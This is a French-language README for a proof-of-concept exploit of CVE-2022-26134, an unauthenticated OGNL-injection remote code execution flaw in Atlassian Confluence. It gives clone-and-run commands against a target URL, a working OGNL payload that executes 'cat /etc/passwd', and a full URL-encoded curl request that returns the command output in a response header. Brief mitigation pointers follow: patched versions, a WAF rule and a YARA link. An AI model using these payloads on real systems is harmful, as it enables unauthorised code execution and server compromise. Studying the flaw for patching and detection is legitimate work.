
Script de preuve de concept exploitant la vulnérabilité d'exécution de code à distance affectant Atlassian Confluence 7.18 et versions antérieures. La vulnérabilité d'injection OGNL permet à un utilisateur non authentifié d'exécuter du code arbitraire sur une instance Confluence Server ou Data Center.
Toutes les versions prises en charge de Confluence Server et Data Center sont affectées.
Les versions de Confluence Server et Data Center après 1.3.0 et inférieures à 7.18.1 sont affectées.
La vulnérabilité a un score CVSS de 10 sur 10 pour la criticité.
Clonez le dépôt
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
Ensuite, vous pouvez exécuter l'exploit avec la commande de votre choix comme suit :
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Exemple avec la commande CURL :
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
Ensuite, le résultat de la commande sera reflété dans le paramètre X-Cmd-Response de l'en-tête de réponse.
Suivez les recommandations officielles d'Atlassian :
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian a publié les versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 et 7.18.1 qui contiennent un correctif pour ce problème.
Cette vulnérabilité affecte toutes les instances auto-hébergées. Si vous utilisez un WAF, vous pouvez bloquer les URL contenant ${ à l'intérieur.
YARA (par Volexity) : https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
UNIQUEMENT À DES FINS ÉDUCATIVES.

Crédit : https://github.com/Nwqda